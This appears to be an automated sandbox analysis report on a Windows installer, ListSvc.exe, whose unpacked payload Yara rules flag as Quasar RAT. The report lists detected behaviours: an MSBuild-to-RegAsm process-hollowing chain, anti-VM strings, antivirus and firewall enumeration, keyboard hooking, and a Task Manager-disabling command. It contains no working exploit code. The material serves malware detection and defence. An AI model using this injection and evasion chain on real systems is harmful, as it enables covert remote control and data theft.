Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\webuser4.dll (copy)	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vboxtray
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: VMwareService
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: VMwareTray
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vboxservice
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: vmtoolsd

Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_004AF91C

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0040AEF4 FindFirstFileW,FindClose,	0_2_0040AEF4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	0_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0060C2B0 FindFirstFileW,GetLastError,	1_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0040E6A0 FindFirstFileW,FindClose,	1_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	1_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	1_2_006B8DE4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_0040AEF4 FindFirstFileW,FindClose,	2_2_0040AEF4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	2_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0060C2B0 FindFirstFileW,GetLastError,	3_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0040E6A0 FindFirstFileW,FindClose,	3_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	3_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	3_2_006B8DE4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 6_2_05170054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,

6_2_05170054

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F1D008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E3D008

.NET source code references suspicious native API functions

Show sources

Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Core/Utilities/NativeMethods.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Core/MouseKeyHook/WinApi/KeyboardNativeMethods.cs	Reference to suspicious API methods: ('MapVirtualKeyEx', 'MapVirtualKeyEx@user32.dll')
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Core/Utilities/NativeMethods.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Core/MouseKeyHook/WinApi/KeyboardNativeMethods.cs	Reference to suspicious API methods: ('MapVirtualKeyEx', 'MapVirtualKeyEx@user32.dll')

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Process created: C:\Users\user\Desktop\ListSvc.exe 'C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3401.tmp' 'c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Local\Temp\ListSvc.url'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF3F6.tmp' 'c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP'

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Code function: 1_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_006A60E8

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Code function: 1_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_005C7CE0

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Code function: 1_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

1_2_005C8B3C

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.618666620.00000000018E0000.00000002.00020000.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.618666620.00000000018E0000.00000002.00020000.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000017.00000002.618666620.00000000018E0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: RegAsm.exe, 00000017.00000002.618666620.00000000018E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	0_2_0040B044
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	0_2_0041E034
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	0_2_0041E080
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	0_2_004AF218
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0040A4CC
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	1_2_0040E7F0
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: GetLocaleInfoW,	1_2_006103F8
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0040DC78
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	2_2_0040B044
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	2_2_0041E034
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	2_2_0041E080
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: GetLocaleInfoW,	2_2_004AF218
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0040A4CC
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	3_2_0040E7F0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: GetLocaleInfoW,	3_2_006103F8
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0040DC78

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Microsoft.Internal.Tasks.Dataflow.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v4.0.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Utilities.v4.0.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Microsoft.Internal.Tasks.Dataflow.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_00405AE0 cpuid

0_2_00405AE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_0041C3D8 GetLocalTime,

0_2_0041C3D8

Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp

Code function: 1_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,

1_2_00625754

Source: C:\Users\user\Desktop\ListSvc.exe

Code function: 0_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

0_2_004B5114

Lowering of HIPS / PFW / Operating System Security Settings:

Contains functionality to disable the Task Manager (.Net Source)

Show sources

Source: 23.2.RegAsm.exe.400000.0.unpack, xClient/Core/Commands/CommandHandler.cs	.Net Code: HandleDoDisableTaskmgr
Source: 38.2.RegAsm.exe.400000.0.unpack, xClient/Core/Commands/CommandHandler.cs	.Net Code: HandleDoDisableTaskmgr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6344, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
